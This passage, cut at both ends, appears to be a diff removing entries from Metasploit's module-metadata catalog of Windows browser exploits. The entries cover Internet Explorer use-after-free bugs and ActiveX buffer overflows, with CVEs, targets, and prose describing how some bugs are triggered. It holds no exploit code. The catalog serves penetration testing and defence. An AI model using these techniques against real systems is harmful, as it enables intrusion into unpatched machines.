This function will then pass on the invalid reference\n to the next functions, eventually used in mshtml!CElement::Doc when it's trying to\n make a call to the object's SecurityContext virtual function at offset +0x70, which\n results a crash. An attacker can take advantage of this by first creating an\n CAnchorElement object, let it free, and then replace the freed memory with another\n fake object. Successfully doing so may allow arbitrary code execution under the\n context of the user.\n\n This bug is specific to Internet Explorer 8 only. It was originally discovered by\n Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again\n by Orange Tsai at Hitcon 2013.", - "references": [ - "CVE-2013-3163", - "OSVDB-94981", - "MSB-MS13-055", - "URL-https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 8 on Windows XP SP3", - "IE 8 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_055_canchor.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_055_canchor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_059_cflatmarkuppointer": { - "name": "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free", - "fullname": "exploit/windows/browser/ms13_059_cflatmarkuppointer", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-06-27", - "type": "exploit", - "author": [ - "corelanc0d3r", - "sinn3r " - ], - "description": "This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9,\n it seems to only affect certain releases of mshtml.dll, ranging from a newly\n installed IE9 (9.0.8112.16446), to 9.00.8112.16502 (July 2013 update). 
IE8\n requires a different way to trigger the vulnerability, but not currently covered\n by this module.\n\n The issue is specific to the browser's IE7 document compatibility, which can be\n defined in X-UA-Compatible, and the content editable mode must be enabled. An\n \"onmove\" event handler is also necessary to be able to trigger the bug, and the\n event will be run twice before the crash. The first time is due to the position\n change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable'\n object is created during a \"SelectAll\" command, and this object will be used later\n on for the crash. The second onmove event seems to be triggered by a InsertButton\n (or Insert-whatever) command, which is also responsible for the free of object\n CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will\n then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and\n then passes this on to the next functions (GetLineInfo -> QIClassID). When this\n reference arrives in function QIClassID, an access violation finally occurs when\n the function is trying to call QueryInterface() with the bad reference, and this\n results a crash. 
Successful control of the freed memory may leverage arbitrary code\n execution under the context of the user.\n\n Note: It is also possible to see a different object being freed and used, doesn't\n always have to be CFlatMarkupPointer.", - "references": [ - "CVE-2013-3184", - "OSVDB-96182", - "MSB-MS13-059", - "BID-61668", - "ZDI-13-194", - "ZDI-13-195" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_059_cflatmarkuppointer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_069_caret": { - "name": "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free", - "fullname": "exploit/windows/browser/ms13_069_caret", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-09-10", - "type": "exploit", - "author": [ - "corelanc0d3r", - "sinn3r " - ], - "description": "This module exploits a use-after-free vulnerability found in Internet Explorer,\n specifically in how the browser handles the caret (text cursor) object. In IE's standards\n mode, the caret handling's vulnerable state can be triggered by first setting up an\n editable page with an input field, and then we can force the caret to update in an\n onbeforeeditfocus event by setting the body's innerHTML property. In this event handler,\n mshtml!CCaret::`vftable' can be freed using a document.write() function, however,\n mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the\n same reference to the CCaret object. When the function tries to use this invalid reference\n to call a virtual function at offset 0x2c, it finally results a crash. 
Precise control of\n the freed object allows arbitrary code execution under the context of the user.", - "references": [ - "CVE-2013-3205", - "OSVDB-97094", - "MSB-MS13-069", - "ZDI-13-217" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE 8 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_069_caret.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_069_caret", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_080_cdisplaypointer": { - "name": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", - "fullname": "exploit/windows/browser/ms13_080_cdisplaypointer", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-08", - "type": "exploit", - "author": [ - "Unknown", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\n multiple research companies and the vendor until the October patch release.\n\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\n If we use a select() function for the CTextArea element, two important things will happen:\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\n event called \"onselect\". 
The \"onselect\" event will allow us to set up for the actual event\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\n object can be forced by using an \"Unselect\" (other approaches also apply), but a reference\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\n the CDoc::GetLineInfo call, because it is still trying to use that to update\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\n possible to achieve arbitrary code execution under the context of the user.", - "references": [ - "CVE-2013-3897", - "OSVDB-98207", - "MSB-MS13-080", - "URL-http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx", - "URL-http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 8 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_080_cdisplaypointer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms13_090_cardspacesigninhelper": { - "name": "MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow", - "fullname": "exploit/windows/browser/ms13_090_cardspacesigninhelper", - "aliases": [], - "rank": 300, - "disclosure_date": 
"2013-11-08", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a vulnerability on the CardSpaceClaimCollection class from the\n icardie.dll ActiveX control. The vulnerability exists while the handling of the\n CardSpaceClaimCollection object. CardSpaceClaimCollections stores a collection of\n elements on a SafeArray and keeps a size field, counting the number of elements on the\n collection. By calling the remove() method on an empty CardSpaceClaimCollection it is\n possible to underflow the length field, storing a negative integer. Later, a call to\n the add() method will use the corrupted length field to compute the address where write\n into the SafeArray data, allowing to corrupt memory with a pointer to controlled contents.\n This module achieves code execution by using VBScript as discovered in the wild on\n November 2013 to (1) create an array of html OBJECT elements, (2) create holes, (3) create\n a CardSpaceClaimCollection whose SafeArray data will reuse one of the holes, (4) corrupt\n one of the legit OBJECT elements with the described integer overflow and (5) achieve code\n execution by forcing the use of the corrupted OBJECT.", - "references": [ - "CVE-2013-3918", - "OSVDB-99555", - "BID-63631", - "MSB-MS13-090", - "URL-http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP with IE 8" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms13_090_cardspacesigninhelper", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms14_012_cmarkup_uaf": { - 
"name": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", - "fullname": "exploit/windows/browser/ms14_012_cmarkup_uaf", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-02-13", - "type": "exploit", - "author": [ - "Unknown", - "Jean-Jamil Khalife", - "juan vazquez " - ], - "description": "This module exploits an use after free condition on Internet Explorer as used in the wild\n as part of \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\n bypass ASLR and DEP.", - "references": [ - "CVE-2014-0322", - "MSB-MS14-012", - "BID-65551", - "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html", - "URL-http://hdwsec.fr/blog/CVE-2014-0322.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP1 / IE 10 / FP 12" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms14_012_cmarkup_uaf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms14_012_textrange": { - "name": "MS14-012 Microsoft Internet Explorer TextRange Use-After-Free", - "fullname": "exploit/windows/browser/ms14_012_textrange", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-11", - "type": "exploit", - "author": [ - "Jason Kratzer", - "sinn3r " - ], - "description": "This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw\n was most likely introduced in 2013, therefore only certain builds of MSHTML are\n affected. 
In our testing with IE9, these vulnerable builds appear to be between\n 9.0.8112.16496 and 9.0.8112.16533, which implies the vulnerability shipped between\n August 2013, when it was introduced, until the fix issued in early March 2014.", - "references": [ - "CVE-2014-0307", - "MSB-MS14-012" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms14_012_textrange.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms14_012_textrange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms14_064_ole_code_execution": { - "name": "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution", - "fullname": "exploit/windows/browser/ms14_064_ole_code_execution", - "aliases": [], - "rank": 400, - "disclosure_date": "2014-11-13", - "type": "exploit", - "author": [ - "Robert Freeman", - "yuange", - "Rik van Duijn", - "Wesley Neelen", - "GradiusX ", - "b33f", - "sinn3r " - ], - "description": "This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.\n The vulnerability is known to affect Internet Explorer 3.0 until version 11 within\n Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will\n only target Windows XP and Windows 7 box due to the Powershell limitation.\n\n Windows XP by defaults supports VBS, therefore it is used as the attack vector. 
On other\n newer Windows systems, the exploit will try using Powershell instead.", - "references": [ - "CVE-2014-6332", - "MSB-MS14-064", - "OSVDB-114533", - "EDB-35229", - "EDB-35308", - "URL-http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows", - "URL-https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP", - "Windows 7" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms14_064_ole_code_execution", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ms16_051_vbscript": { - "name": "Internet Explorer 11 VBScript Engine Memory Corruption", - "fullname": "exploit/windows/browser/ms16_051_vbscript", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-05-10", - "type": "exploit", - "author": [ - "Theori", - "William Webb " - ], - "description": "This module exploits the memory corruption vulnerability (CVE-2016-0189)\n present in the VBScript engine of Internet Explorer 11.", - "references": [ - "CVE-2016-0189", - "MSB-MS16-051" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 10 with IE 11" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ms16_051_vbscript.rb", - "is_install_path": true, - "ref_name": "windows/browser/ms16_051_vbscript", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/msvidctl_mpeg2": { - "name": "Microsoft 
DirectShow (msvidctl.dll) MPEG-2 Memory Corruption", - "fullname": "exploit/windows/browser/msvidctl_mpeg2", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-07-05", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a memory corruption within the MSVidCtl component of Microsoft\n DirectShow (BDATuner.MPEG2TuneRequest).\n By loading a specially crafted GIF file, an attacker can overrun a buffer and\n execute arbitrary code.\n\n ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid", - "references": [ - "CVE-2008-0015", - "OSVDB-55651", - "BID-35558", - "MSB-MS09-032", - "MSB-MS09-037" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/msvidctl_mpeg2.rb", - "is_install_path": true, - "ref_name": "windows/browser/msvidctl_mpeg2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/mswhale_checkforupdates": { - "name": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/mswhale_checkforupdates", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-04-15", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n Gateway Whale Client. 
When sending an overly long string to CheckForUpdates()\n method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2007-2238", - "OSVDB-53933", - "URL-http://technet.microsoft.com/en-us/library/dd282918.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/mswhale_checkforupdates.rb", - "is_install_path": true, - "ref_name": "windows/browser/mswhale_checkforupdates", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/msxml_get_definition_code_exec": { - "name": "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption", - "fullname": "exploit/windows/browser/msxml_get_definition_code_exec", - "aliases": [], - "rank": 400, - "disclosure_date": "2012-06-12", - "type": "exploit", - "author": [ - "inking26", - "binjo", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a memory corruption flaw in Microsoft XML Core Services\n when trying to access an uninitialized Node with the getDefinition API, which\n may corrupt memory allowing remote code execution.", - "references": [ - "CVE-2012-1889", - "BID-53934", - "OSVDB-82873", - "MSB-MS12-043", - "URL-http://technet.microsoft.com/en-us/security/advisory/2719615", - "URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462", - "URL-https://www.rapid7.com/blog/post/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows 
XP SP3 / Vista SP2", - "IE 8 on Windows XP SP3", - "IE 8 with Java 6 on Windows XP SP3", - "IE 8 with Java 6 on Windows 7 SP1/Vista SP2", - "IE 9 with Java 6 on Windows 7 SP1" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/msxml_get_definition_code_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/nctaudiofile2_setformatlikesample": { - "name": "NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow", - "fullname": "exploit/windows/browser/nctaudiofile2_setformatlikesample", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-01-24", - "type": "exploit", - "author": [ - "MC ", - "dookie", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX\n Control provided by various audio applications. 
By sending an overly long\n string to the \"SetFormatLikeSample()\" method, an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2007-0018", - "OSVDB-32032", - "BID-22196", - "US-CERT-VU-292713" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2/SP3 Pro English (IE6)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb", - "is_install_path": true, - "ref_name": "windows/browser/nctaudiofile2_setformatlikesample", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/nis2004_antispam": { - "name": "Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/nis2004_antispam", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-03-19", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Norton AntiSpam 2004. 
When\n sending an overly long string to the LaunchCustomRuleWizard() method\n of symspam.dll (2004.1.0.147) an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2004-0363", - "OSVDB-6249", - "BID-9916" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/nis2004_antispam.rb", - "is_install_path": true, - "ref_name": "windows/browser/nis2004_antispam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/nis2004_get": { - "name": "Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/nis2004_get", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-05-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX\n Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004.\n By sending an overly long string to the \"Get()\" method, an attacker may be\n able to execute arbitrary code.", - "references": [ - "CVE-2007-1689", - "OSVDB-36164", - "URL-http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0/SP1 Pro English", - "Windows 2000 Pro English All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/nis2004_get.rb", - "is_install_path": true, - "ref_name": "windows/browser/nis2004_get", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, 
- "exploit_windows/browser/notes_handler_cmdinject": { - "name": "IBM Lotus Notes Client URL Handler Command Injection", - "fullname": "exploit/windows/browser/notes_handler_cmdinject", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-18", - "type": "exploit", - "author": [ - "Moritz Jodeit", - "Sean de Regge", - "juan vazquez " - ], - "description": "This module exploits a command injection vulnerability in the URL handler for\n for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with\n a specially crafted notes:// URL to execute arbitrary commands with also arbitrary\n arguments. This module has been tested successfully on Windows XP SP3 with IE8,\n Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.", - "references": [ - "CVE-2012-2174", - "OSVDB-83063", - "BID-54070", - "ZDI-12-154", - "URL-http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html", - "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21598348" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/browser/notes_handler_cmdinject.rb", - "is_install_path": true, - "ref_name": "windows/browser/notes_handler_cmdinject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/browser/novell_groupwise_gwcls1_actvx": { - "name": "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution", - "fullname": "exploit/windows/browser/novell_groupwise_gwcls1_actvx", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-30", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll\n ActiveX. 
Several methods in the GWCalServer control use user provided data as\n a pointer, which allows to read arbitrary memory and execute arbitrary code. This\n module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The\n JRE6 needs to be installed to achieve ASLR bypass.", - "references": [ - "CVE-2012-0439", - "OSVDB-89700", - "BID-57658", - "ZDI-13-008", - "URL-http://www.novell.com/support/kb/doc.php?id=7011688" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb", - "is_install_path": true, - "ref_name": "windows/browser/novell_groupwise_gwcls1_actvx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_callbackurl": { - "name": "Novell iPrint Client ActiveX Control call-back-url Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_callbackurl", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-08-20", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.\n When sending an overly long string to the 'call-back-url' parameter in an\n op-client-interface-version action of ienipp.ocx an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2010-1527", - "OSVDB-67411", - "URL-http://web.archive.org/web/20100824204359/http://secunia.com:80/secunia_research/2010-104", - "EDB-15042" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - 
"autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_callbackurl.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_callbackurl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_datetime": { - "name": "Novell iPrint Client ActiveX Control Date/Time Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_datetime", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-08", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n passing a specially crafted date/time string via certain parameters to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.", - "references": [ - "CVE-2009-1569", - "BID-37242", - "OSVDB-60804", - "URL-http://web.archive.org/web/20091213033620/http://secunia.com:80/advisories/35004" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "iPrint 5.30 Windows Client" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_datetime.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_datetime", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_executerequest": { - "name": "Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_executerequest", - "aliases": [], - "rank": 
300, - "disclosure_date": "2008-02-22", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.26. When\n sending an overly long string to the ExecuteRequest() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-0935", - "OSVDB-42063", - "BID-27939" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_executerequest.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_executerequest", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_executerequest_dbg": { - "name": "Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_executerequest_dbg", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-08-04", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.\n When sending an overly long string to the 'debug' parameter in ExecuteRequest()\n property of ienipp.ocx an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-3106", - "OSVDB-66960", - "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-10-06", - "EDB-15001" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb", - 
"is_install_path": true, - "ref_name": "windows/browser/novelliprint_executerequest_dbg", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_getdriversettings": { - "name": "Novell iPrint Client ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_getdriversettings", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-06-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-2908", - "OSVDB-46194", - "URL-http://web.archive.org/web/20081206030916/http://secunia.com:80/advisories/30709/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/novelliprint_getdriversettings.rb", - "is_install_path": true, - "ref_name": "windows/browser/novelliprint_getdriversettings", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/novelliprint_getdriversettings_2": { - "name": "Novell iPrint Client ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/novelliprint_getdriversettings_2", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-11-15", - "type": "exploit", - "author": [ - "mr_me ", - "Dr_IDE" - ], - "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.52. 
